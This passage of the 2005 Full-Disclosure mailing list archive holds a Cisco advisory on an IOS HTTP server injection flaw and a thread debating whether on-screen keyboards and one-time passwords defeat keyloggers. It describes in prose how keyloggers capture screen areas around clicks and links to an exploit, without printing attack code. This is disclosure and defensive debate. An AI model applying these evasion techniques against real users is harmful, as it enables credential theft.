mouse, display the keyboard on random location of the screen. ... Trivially, and already long ago, overcome by screen-shot keyloggers. > ... Add > a random password and challenge authentication process. Why? This adds nothing but annoyance to the user, thus reducing usability. If you're going to move to OTP, why _also_ move to an onscreen keyboard? It's almost like you believe that taking two unrelated approaches that indivdually make no improvement whatsoever will suddenly make some real improvement when combined. A hint -- zero plus zero equals ?????? As already explained ad nauseum to the other na?ve "use OTP", if you do not do something "out of band" _relative to any and all possible "bad code" that could be running on a compromised machine_, you have lost. To achieve that requires a second, "secure" piece of _hardware_ that simply uses the network connection through the compromised machine to communicate in a crptographically secure way with the server. The OP made no mention of designing hardware > my 2 cents, If that's really what the above "advice" is worth, inflation must be _really bad_ where you are! Regards, Nick FitzGerald From psirt at cisco.com Thu Dec 1 22:43:52 2005 From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team) Date: Thu, 01 Dec 2005 17:43:52 -0500 Subject: [Full-disclosure] Cisco Security Advisory: IOS HTTP Server Command Injection Vulnerability Message-ID: <200512011745.httpinjection@psirt.cisco.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: IOS HTTP Server Command Injection Vulnerability ======================================================================== Document ID: 68322 Advisory ID: cisco-sa-20051201-http http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml Revision 1.0 For Public Release 2005 December 01 2100 UTC (GMT) - ----------------------------------------------------------------------- Contents ======== Summary Affected Products Details Impact Software Versions and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of This Notice: INTERIM Distribution Revision History Cisco Security Procedures - ----------------------------------------------------------------------- Summary ======= A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a "show buffers" command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected. Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml. Affected Products ================= This security advisory applies to all Cisco products that run Cisco IOS Software versions 11.0 through 12.4 with the HTTP server enabled. A system which contains the IOS HTTP server or HTTP secure server, but does not have it enabled, is not affected. To determine if the HTTP server is running on your device, issue the "show ip http server status" and "show ip http server secure status" commands at the prompt and look for output similar to: Router>show ip http server status HTTP server status: Enabled If the device is not running the HTTP server, you should see output similar to: Router>show ip http server status HTTP server status: Disabled Any version of Cisco IOS prior to the versions which will be listed in the Fixed Software section below may be vulnerable. Cisco IOS XR is not affected. To determine the software running on a Cisco product, log in to the device and issue the "show version" command to display the system banner. Cisco IOS Software will identify itself as "Internetwork Operating System Software" or simply "IOS". On the next line of output, the image name will be displayed between parentheses, followed by "Version" and the IOS release name. Other Cisco devices will not have the "show version" command or will give different output. The following example identifies a Cisco product running IOS release 12.3(6) with an installed image name of C3640-I-M: Cisco Internetwork Operating System Software IOS (tm) 3600 Software (C3640-I-M), Version 12.3(6), RELEASE SOFTWARE (fc3) The next example shows a product running IOS release 12.3(11)T3 with an image name of C3845-ADVIPSERVICESK9-M: Cisco IOS Software, 3800 Software (C3845-ADVIPSERVICESK9-M), Version 12.3(11)T3, RELEASE SOFTWARE (fc4) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by Cisco Systems, Inc. Additional information about Cisco IOS release naming can be found at http://www.cisco.com/warp/public/620/1.html. No other Cisco products are currently known to be affected by the vulnerability addressed in this advisory. Details ======= The Cisco IOS Web browser interface (which enables the device to perform as an HTTP server) allows configuration and monitoring of a router or access server using any web browser. This feature was introduced in IOS 11.0. A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a "show buffers" command, will be passed to the browser requesting the page. This HTML code could be interpreted by the browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. In order to be vulnerable to the cross-site scripting attack, a user must browse and view the content during the same period of time the injected code exists in memory. On the other hand, if a user does not browse contaminated dynamic content on the device, then exploitation is not possible. A proof of concept exploit exists for this vulnerability, in which the exploit attempts to reset the enable password on the device. For the attack to work against the device itself, the user browsing tainted dynamic content on the router will only be able to execute commands at or below the privilege level for which they are authenticated and authorized for on the device. This vulnerability is documented in Cisco Bug ID CSCsc64976. Impact ====== Successful exploitation of the vulnerability may result in an attacker executing commands on the device, including the possibility of gaining full administrative privileges on the device which is dependent on the privilege level of the authenticated user. Software Versions and Fixes =========================== No software fixes are currently available. This section will be updated regularly as soon as software fixes are available. Workarounds =========== Disable the HTTP server +---------------------- If the HTTP server is not used for any legitimate purposes on the device, it is a best practice to disable it by issuing the following commands in configure mode: no ip http server no ip http secure-server Disable the HTTP WEB_EXEC service +-------------------------------- A feature was introduced in 12.3(14)T and later in which selective HTTP and HTTPS services could be enabled or disabled. Two typical services are WEB_EXEC and the IOS Certificate Server (SCEP). The WEB_EXEC service provides a facility to configure the box and retrieve current state of the box from remote clients. The IOS Certificate Server service provides a facility wherein remote clients can enroll and obtain Crypto Certificates. It is possible to disable the WEB_EXEC service while still leaving SCEP running to serve Certificates. If an installation requires the use of the SCEP service, the WEB_EXEC service may be disabled via the commands in configure mode: no ip http active-session-modules WEB_EXEC no ip http secure-active-session-modules WEB_EXEC Avoid the use of Web-based SHOW commands +--------------------------------------- Successful exploitation of this vulnerability requires an unsuspecting user to request dynamic content from the device via the "show" commands which are available. Avoiding the use of those commands via the web interface until an upgrade to fixed software is possible may be perfectly legitimate for some installations. Obtaining Fixed Software ======================== Cisco will make free software available to address this vulnerability for affected customers. This advisory will be updated as fixed software becomes available. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/public/sw-license-agreement.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact either "psirt at cisco.com" or "security-alert at cisco.com" for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third-party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreement with third-party support organizations such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but who do not hold a Cisco service contract and customers who purchase through third-party vendors but are unsuccessful at obtaining fixed software through their point of sale should get their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac at cisco.com Have your product serial number available and give the URL of this notice as evidence of your entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including special localized telephone numbers and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== This vulnerability was disclosed in a public posting to the Bugtraq mailing list, and at the following URL: http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/cisco/index.html. The Cisco PSIRT is not aware of any malicious use of the vulnerability described in this advisory. Status of This Notice: INTERIM ============================== THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. CISCO EXPECTS TO UPDATE THIS DOCUMENT WITHIN FROM THE ORIGINAL DATE OF THIS NOTICE. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml. In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce at cisco.com * first-teams at first.org * bugtraq at securityfocus.com * vulnwatch at vulnwatch.org * cisco at spot.colorado.edu * cisco-nsp at puck.nether.net * full-disclosure at lists.grok.org.uk * comp.dcom.sys.cisco at newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | 1-December-2005. | Initial | | 1.0 | | draft. | +----------------------------------------+ Cisco Security Procedures Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt/. - ----------------------------------------------------------------------- All contents are Copyright 1992-2005 Cisco Systems, Inc. All rights reserved. - ----------------------------------------------------------------------- Updated: Dec 01, 2005 Document ID: 68322 - ----------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDj3udezGozzK2tZARAmkwAJ4xrlLCF75ryXyuX2/62peJ1YAUegCfYdUS jfZM0o9w1mRIAVF4C3uunRs= =A852 -----END PGP SIGNATURE----- From nick at virus-l.demon.co.uk Thu Dec 1 23:07:00 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Fri, 02 Dec 2005 12:07:00 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <009301c5f6c9$371f6170$0200a8c0@DORKA> Message-ID: <439038E4.9558.2C79C48C@gmail.com> php0t wrote: [top-posting-itis corrected] > > I agree but what about the second random password and challenge > > authentification? Both should be unique and usage once. > > How'bout adding direct printing on lpt of new one-time usage passwords? :) So you will limit access to your services to only those that happen to have a printer with them? Note to self -- buy larger laptop carry bag and "protable" printer so can keep using online banking... 8-) > In order to get the passwords, they'd have to hook the printing, too. Not > too common, yet. In fact, so uncommon I've not heard of it. Irrelevant though -- it is far too easily broken and if the OP is trying to protect anything sufficiently "valuable" you can bet it will be broken, as doing so is just too easy... (And I won't even get started on the need of such a web-based system to require ActiveX and/or system-access privileged Java applets to work at all "properly", but will note that, as a general rule, if you need your users to lower or weaken the security of their machines to improve the security of your system, then there is something fundamentally borked in _your_ design!) Regards, Nick FitzGerald From lyal.collins at key2it.com.au Thu Dec 1 23:09:36 2005 From: lyal.collins at key2it.com.au (Lyal Collins) Date: Fri, 2 Dec 2005 10:09:36 +1100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: Message-ID: <006c01c5f6cc$4cd18d10$6600a8c0@kpllaptop> "Usage once" is not an effeective measure against mitm attacks, as has been discussed earlier in this thread. Give user error message, while executing txn of attacker's choice on the victim site with the legitimate user's authority. How do disputed transactions get resovled in this supposedly more secure framework since 'the authenticaiton is infallible' (marketing speak)? Lyal -----Original Message----- From: deepquest [mailto:adf at code511.com] Sent: Friday, 2 December 2005 9:44 AM To: Lyal Collins Cc: foofus at foofus.net; 'Full-Disclosure' Subject: Re: [Full-disclosure] Most common keystroke loggers? > In 1996, this virtual keypad concept was broken by taking 10x10 > pixel images > under the cursor click, showing the number/letters used in that > password. > > Virtual keypads are just a minor change of tactics, not a long term > resolution to this risk, imho. I agree but what about the second random password and challenge authentification? Both should be unique and usage once. -D From very at unprivate.com Thu Dec 1 23:15:37 2005 From: very at unprivate.com (php0t) Date: Fri, 2 Dec 2005 00:15:37 +0100 Subject: [Full-disclosure] Most common keystroke loggers? References: <439038E4.9558.2C79C48C@gmail.com> Message-ID: <00b901c5f6cd$236a1310$0200a8c0@DORKA> Yes, obviously not perfect or even near, i didn't even say that. Just a plus, an alternative to having to depend on keyboard / screen / files to help out with the authentication discussed. php0t ----- Original Message ----- From: "Nick FitzGerald" To: Sent: Friday, December 02, 2005 12:07 AM Subject: Re: [Full-disclosure] Most common keystroke loggers? > php0t wrote: > > [top-posting-itis corrected] >> > I agree but what about the second random password and challenge >> > authentification? Both should be unique and usage once. >> >> How'bout adding direct printing on lpt of new one-time usage passwords? >> :) > > So you will limit access to your services to only those that happen to > have a printer with them? Note to self -- buy larger laptop carry bag > and "protable" printer so can keep using online banking... 8-) > >> In order to get the passwords, they'd have to hook the printing, too. Not >> too common, yet. > > In fact, so uncommon I've not heard of it. > > Irrelevant though -- it is far too easily broken and if the OP is > trying to protect anything sufficiently "valuable" you can bet it will > be broken, as doing so is just too easy... > > (And I won't even get started on the need of such a web-based system to > require ActiveX and/or system-access privileged Java applets to work at > all "properly", but will note that, as a general rule, if you need your > users to lower or weaken the security of their machines to improve the > security of your system, then there is something fundamentally borked > in _your_ design!) > > > Regards, > > Nick FitzGerald > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From ad at heapoverflow.com Thu Dec 1 23:16:06 2005 From: ad at heapoverflow.com (ad at heapoverflow.com) Date: Fri, 2 Dec 2005 00:16:06 +0100 Subject: [Full-disclosure] msdtc exp In-Reply-To: <438E6921.3010705@0x557.org> Message-ID: <000001c5f6cd$35317750$0400a8c0@winxp64> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Several errors in your poc, if(argc == 7) (your usage says 5 or 6...) And if(argc < 6 || argv[argc-1][0] != 'S') What a leet script kiddie protection .... lol , keep it up :> - -----Message d'origine----- De : full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] De la part de no-reply Envoy? : jeudi 1 d?cembre 2005 04:08 ? : full-disclosure at lists.grok.org.uk Objet : [Full-disclosure] msdtc exp - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://blog.0x557.org/swan/archives/msdtc.cpp - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFDjmkhPlYIPITSGxURAtCkAJ910OOS8Pjjj1yHf32L/pHo3NHa0QCfUUt+ AzVozrv5Ileh03TfEa/frnU= =HJxh - -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ4+ENq+LRXunxpxfAQJluw//RtMzswPRhPnnwoVrfkbtyMbY52F7ZvDn QHj+1DVCJtMovViS9eUO7lLHX78FjFPaosBGhBdlRE/44Xui+xxsuILPjDKdaMXh s/o3o51ctL6kTyIrjFO8qUJPlFm+YuoADjmcLF6w9ZHGiijjR95gf1jv/twg0GRy elpBgX9RRpF65V2XorfqOCckuXNN+YTZ9KEIQWbE+f93iR3oUDqv09tF8XUqkod/ kF0+l2dizgL7yjZH/4azpSFf25XEG6RflER/gVTRtYXP9mOIaNTiPQyNy1Typ6b9 r3CWN/f/aOH6BZ6MC76RNqDeswuqnfjVADSl633RREPKUGTtAh2sE4kaXm0aY5Lr 2LaFb5bSjubFbhHO2EeoQACN9yLPRD5kglkAC0FhGFPo67ZqxNABI1d/QYMG5dV2 4yGlLevqSfB1KSqoYP7JspFQYWd6/npgScPGoCbjxlxNJR71l2Wi0OXfMrGH2c9I E3XbLwKHNob+fIhfFRRoAJWU1cJvIwBbU5G/ifwetE0e9Qbk0zIR7lt6pnYru5kS p4ylW1hdYT2bQjQxm3opcwrwc+5UXnSrRGnts7a7XWKv04tZ0qi3AIRtQJX61klT mMpoXUAlBYpUsGLsHtTrRToZHzXFeEUcDVb0nOFSimLGQzNt6IK2O8ip30pMBJ1t ozzWlX40sF8= =Xbzo -----END PGP SIGNATURE----- From mz4ph0d at gmail.com Thu Dec 1 23:18:26 2005 From: mz4ph0d at gmail.com (mz4ph0d at gmail.com) Date: Fri, 2 Dec 2005 10:18:26 +1100 Subject: [Full-disclosure] Most common keystroke loggers? Message-ID: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> At 9:41 AM +1100 2/12/05, Lyal Collins wrote: >In 1996, this virtual keypad concept was broken by taking 10x10 pixel images >under the cursor click, showing the number/letters used in that password. > >Virtual keypads are just a minor change of tactics, not a long term >resolution to this risk, imho. While it's obviously NOT the most secure way, that absolutely nothing can be considered secure if the system is compromised, that it would depend on either depending on either Javascript being enabled on the client-side or using Java (or perhaps Flash) for the interface elements, and using a random system to interpret the results (because the interaction with the server over the network can also likely be parsed), etc, etc ... What about a system that used a randomly built and placed keyboard where the button (or more effectively the entire keyboard, though less usable obviously) went blank on mouseover and click? That would at least stop two of those problems, those being basic keylogging, and screenshots of the hotspot on click. At least then if a system like this is the only one that is deemed doable it would be more secure than one that didn't have those features. Yes? It may as well be on the higher end of insecure than the lower end, (if "insecure" can be seen as a scale, as unfortunately it often has to be in the real world with budgets and stupid management). Z. From daniels at Ponderosatel.com Thu Dec 1 23:40:09 2005 From: daniels at Ponderosatel.com (Daniel Sichel) Date: Thu, 1 Dec 2005 15:40:09 -0800 Subject: [Full-disclosure] RE: Good old days and flames Message-ID: <190DFDD2F99A65469B4B15D3658C0D2B016929C5@ptc6.ponderosatel.com> two irrelevancies for you folks >WildCAT BBS Anyone???? :) > >I remember playing tradewars and calling who knows where to get new text >files :) > >Used Tone-loC a lot more back then :) > I rember my first zmodem download. I dropped it in the middle to test the resume feature. When I saw it work, I was so happy I did it again with a different file just for the fun of it. How lame is that? Also IMHO the quality of flames on this list is well above average. I am still chuckling over "show me on the doll..." and "hello pot???" Dan S. From lyal.collins at key2it.com.au Fri Dec 2 00:11:54 2005 From: lyal.collins at key2it.com.au (Lyal Collins) Date: Fri, 2 Dec 2005 11:11:54 +1100 Subject: [Full-disclosure] Most common keystroke loggers? Message-ID: <001001c5f6d5$00c0f600$6600a8c0@kpllaptop> Typo - I meant 1997 NOT 1996. -----Original Message----- From: Lyal Collins [mailto:lyal.collins at key2it.com.au] Sent: Friday, 2 December 2005 9:42 AM To: 'deepquest'; 'foofus at foofus.net' Cc: 'Full-Disclosure' Subject: RE: [Full-disclosure] Most common keystroke loggers? In 1996, this virtual keypad concept was broken by taking 10x10 pixel images under the cursor click, showing the number/letters used in that password. Virtual keypads are just a minor change of tactics, not a long term resolution to this risk, imho. Lyal -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of deepquest Sent: Friday, 2 December 2005 9:26 AM To: foofus at foofus.net Cc: Full-Disclosure Subject: Re: [Full-disclosure] Most common keystroke loggers? To me the only thing that can defeat keystroke is what a software or trojan can not do: See (OCR is just a partial application of guess but not applicable in that case) Imagine a web page with a virtual keyboard page (clickable). In order to prevent the localisation on the keys mapping based on position of the mouse, display the keyboard on random location of the screen. Add a random password and challenge authentication process. my 2 cents, Deepquest "Justification of windows usage is a combinaison of Stockholm Syndrome and cognitive dissonance." -------------------------------------------------------------- Propaganda http://deepquest.code511.com/blog FIB http://www.futureisbeta.com PGP DH/DSS http://www.futureisbeta.com/pgp -------------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From lyal.collins at key2it.com.au Fri Dec 2 00:16:21 2005 From: lyal.collins at key2it.com.au (Lyal Collins) Date: Fri, 2 Dec 2005 11:16:21 +1100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> Message-ID: <001101c5f6d5$9fda54c0$6600a8c0@kpllaptop> Just expand the size of the image captured under the hotspot to include surrounding buttons. If the image shows the values "around" the button clicked, it makes it possible (but less trivial) to infer the value clicked. Having a totally blank on-screen keypad might work - let the users guess their own passwords!!! Lyal -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of mz4ph0d at gmail.com Sent: Friday, 2 December 2005 10:18 AM To: full-disclosure at lists.grok.org.uk Subject: re: [Full-disclosure] Most common keystroke loggers? At 9:41 AM +1100 2/12/05, Lyal Collins wrote: >In 1996, this virtual keypad concept was broken by taking 10x10 pixel >images under the cursor click, showing the number/letters used in that >password. > >Virtual keypads are just a minor change of tactics, not a long term >resolution to this risk, imho. [snip] What about a system that used a randomly built and placed keyboard where the button (or more effectively the entire keyboard, though less usable obviously) went blank on mouseover and click? That would at least stop two of those problems, those being basic keylogging, and screenshots of the hotspot on click. At least then if a system like this is the only one that is deemed doable it would be more secure than one that didn't have those features. Yes? It may as well be on the higher end of insecure than the lower end, (if "insecure" can be seen as a scale, as unfortunately it often has to be in the real world with budgets and stupid management). Z. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From nick at virus-l.demon.co.uk Fri Dec 2 00:31:56 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Fri, 02 Dec 2005 13:31:56 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> Message-ID: <43904CCC.13101.2CC78620@gmail.com> mz4ph0d at gmail.com to Lyal Collins: > >In 1996, this virtual keypad concept was broken by taking 10x10 pixel images > >under the cursor click, showing the number/letters used in that password. > > > >Virtual keypads are just a minor change of tactics, not a long term > >resolution to this risk, imho. > > While it's obviously NOT the most secure way, that absolutely > nothing can be considered secure if the system is compromised, > that it would depend on either depending on either Javascript > being enabled on the client-side or using Java (or perhaps > Flash) for the interface elements, and using a random system > to interpret the results (because the interaction with the server > over the network can also likely be parsed), etc, etc ... > > What about a system that used a randomly built and placed > keyboard ... What's with this obsession with annoying the user with random placement? And _much_ worse, random key layout? Neither buy you anything, nor does the combination, so stop suggesting them already. > ... where the button (or more effectively the entire > keyboard, though less usable obviously) went blank on > mouseover and click? Absolutely trivially broken. As most key loggers already monitor the web page (or the domain of the web page) all they need do is add a "grab a screen shot when the randomized keypad window pops open from " and maybe a "grab the top-left window location of that window" then all the "keylogger" needes to do is record the positions of mouse clicks. Broken. Perhaps twenty minutes coding... And don't get me started on the usability issues -- it would be entirely useless for most fine-motor or visually impaired users who would be able to use a normal (onscreen) keyboard... > That would at least stop two of those problems, those being > basic keylogging, and screenshots of the hotspot on click. Yet it entirely fails to solve the problem of recording the keys that the user "presses", "types" or however you prefer to express it. The _point_ is not to prevent keylogging _pre se_ but to prevent stealing the _information_ conveyed in the "keying". Your suggested scheme is precisely useless for solving that problem. > At least then if a system like this is the only one that is > deemed doable it would be more secure than one that > didn't have those features. Yes? It may as well be on the > higher end of insecure than the lower end, (if "insecure" can > be seen as a scale, as unfortunately it often has to be in the > real world with budgets and stupid management). This is just as insecure as a plain onscreen keyboard, and with less usability. Sounds like a bargain at any price -- NOT! You are deeply confused if you think "is totally trivial and hasn't been attacked _yet_" is in any meaningful way "more secure" than "is equally trivial and has already been broken". > Z. Yes, go back to sleep... Regards, Nick FitzGerald From kyle at randomvoids.com Fri Dec 2 00:34:49 2005 From: kyle at randomvoids.com (Kyle Lutze) Date: Thu, 01 Dec 2005 16:34:49 -0800 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <438F448F.402@thievco.com> References: <1133457890.12950.80.camel@localhost> <438F448F.402@thievco.com> Message-ID: <438F96A9.70705@randomvoids.com> Blue Boar wrote: > Shannon Johnston wrote: > >> Hi All, >> I'm looking for input on what you all believe the most common keystroke >> loggers are. I've been challenged to write an authentication method (for >> a web site) that can be secure while using a compromised system. > > > I don't think that's possible for all compromise situations, given > today's desktop OS software. It might be possible with a Palladium-like > system (and you trust that the secure side isn't compromised) and/or a > hardware assist that doesn't trust the host OS (think small USB-attached > computer on a stick.) > > However, given your query, if you simply want to play the known-threats > game, you can just require that the Client have up-to-date AV and > antispyware software, and scans clean. That's a little orthogonal to > the issue of trying to be secure in the face of a keylogger installed, > but probably a better thing to shoot for. > > If, for some reason, you only care about the case where a "keylogger" is > installed, then you can go with some scheme like making the user pick > numbers of a randomly-scrambled keypad on the screen, with the mouse. > > Note, however, that "keyloggers" that grab some portion of the screen > surrounding the mouse pointer every time you click have already been > observed in the wild. They are designed to specifically defeat this > kind of mechanism. > Actually, I think there's a relatively easy solution, make it so every single time they want to login, have a different set of characters line up to their password. That didn't make much sense, here's a good example say somebody's password is foobar, on screen there would be a page that shows the new alignment of characters,such as saying a=c, d=3, b=z, etc. so instead of typing foobar the password they would type in for that session would be hnnzck. The next time the screen came up, it would be a=n, b=l, etc. and the password they would enter would be something else. Then, if the computer had a keylogger, not too much anybody could do with that info. Kyle From BlueBoar at thievco.com Fri Dec 2 00:48:30 2005 From: BlueBoar at thievco.com (Blue Boar) Date: Thu, 01 Dec 2005 16:48:30 -0800 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <438F96A9.70705@randomvoids.com> References: <1133457890.12950.80.camel@localhost> <438F448F.402@thievco.com> <438F96A9.70705@randomvoids.com> Message-ID: <438F99DE.9050104@thievco.com> Kyle Lutze wrote: > say somebody's password is foobar, on screen there would be a page that > shows the new alignment of characters,such as saying a=c, d=3, b=z, etc. > so instead of typing foobar the password they would type in for that > session would be hnnzck. > > The next time the screen came up, it would be a=n, b=l, etc. and the > password they would enter would be something else. Then, if the computer > had a keylogger, not too much anybody could do with that info. If the only threat in the world were keyloggers, there are many schemes you could use. My main point is that if your computer is fully compromised and the attacker can adapt, there's no scheme you can up by adding just software to the existing client computers that will help. Second, the scheme you just proposed is a monoalphabetic substitution cipher. The are considered somewhat weak, i.e. they print them in the newspaper to be solved with a pencil during your communte. BB From gugdias at gmail.com Fri Dec 2 01:16:55 2005 From: gugdias at gmail.com (Gustavo) Date: Thu, 1 Dec 2005 23:16:55 -0200 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <439030F5.16919.2C5AC7D0@gmail.com> References: <1133457890.12950.80.camel@localhost> <47ed8a210512011208i17bcbde7l@mail.gmail.com> <439030F5.16919.2C5AC7D0@gmail.com> Message-ID: <47ed8a210512011716g51f2913bu@mail.gmail.com> 2005/12/1, Nick FitzGerald : > Some South American banks currently under massive identity > theft/keylogging "attack" (like Banco Brasil) apparently don't talk to > others in the banking industry, as some have recently started using > such "on-screen keyboards" to "defeat" the keylogging attackers that > hound their customers. Within a very short time period we saw some of > those keyloggers adapt by adding screenshot-grabbing of a small area > around the mouse point hot-spot. Seems they talked with uninformed > "security consultants" rather than folk who know how systems work, what > malware is, what it can do that it may not be doing today and, in this > case, what has already been tried and trivially beaten... They (Banco do Brasil) are currently using a software, automatically installed into the user's system without his explicit knowledge (coming together with the java visual keyboard) that is meant to prevent malwares. The software, named Gbuster and installed as gbieh.dll, works silently and uses malware techniques to avoid being deleted or uninstalled, giving no such option. > If you don't understand that all the I/O on the "compromised" machine > (for the types of machine we are talking about) can be intercepted, you > shouldn't be trying to answer the OP's question (and if the OP > understood that, he would not have asked as he would have realized he > was aiming at doing the impossible). Agree. I answered based on the premise he wanted to get rid of the keylogging, only. Regards, Gustavo From nick at virus-l.demon.co.uk Fri Dec 2 01:19:35 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Fri, 02 Dec 2005 14:19:35 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <438F96A9.70705@randomvoids.com> References: <438F448F.402@thievco.com> Message-ID: <439057F7.880.2CF3274F@gmail.com> Kyle Lutze to Blue Boar: <> > > Note, however, that "keyloggers" that grab some portion of the screen > > surrounding the mouse pointer every time you click have already been > > observed in the wild. They are designed to specifically defeat this > > kind of mechanism. > > > Actually, I think there's a relatively easy solution, make it so every > single time they want to login, have a different set of characters line > up to their password. > That didn't make much sense, here's a good example > > say somebody's password is foobar, on screen ... ^^^^^^^^^ ||||||||| You _really_ don't get the issue here, do you?? "on screen" means that it can be captured. Thus, _it CANNOT work to avoid capture on a compromised machine_. If you can display it, a (sufficiently determined) attacker can capture it. > ... there would be a page that > shows the new alignment of characters,such as saying a=c, d=3, b=z, etc. > so instead of typing foobar the password they would type in for that > session would be hnnzck. And, as already pointed out in response to exactly the same suggestion from someone else, depending on the _user_ to do the encoding for you in a reliable and error-free way is not exactly a recipe for success... > The next time the screen came up, it would be a=n, b=l, etc. and the > password they would enter would be something else. Then, if the computer > had a keylogger, not too much anybody could do with that info. But the keylogger author would rewrite the code to _also_ grab a screenshot of the encoding table, or simply to just grab the HTML that describes the page if the encoding table is not purely graphical. If you want to solve this kind of "problem" don't think "what's a clever thing I can do to complicate the process?", but think "if I were an attacker, what could I do?". When you understand the _scope_ of the options available to the attacker (rather than the _actual instances_ of "attack" that are known to already have been implemented) you are well-placed to propose "solutions"... So far, no-one suggesting solutions has fallen into that category (and there's a good reason for that). Regards, Nick FitzGerald From mz4ph0d at gmail.com Fri Dec 2 01:39:56 2005 From: mz4ph0d at gmail.com (mz4ph0d at gmail.com) Date: Fri, 2 Dec 2005 12:39:56 +1100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <439057F7.880.2CF3274F@gmail.com> References: <438F448F.402@thievco.com> 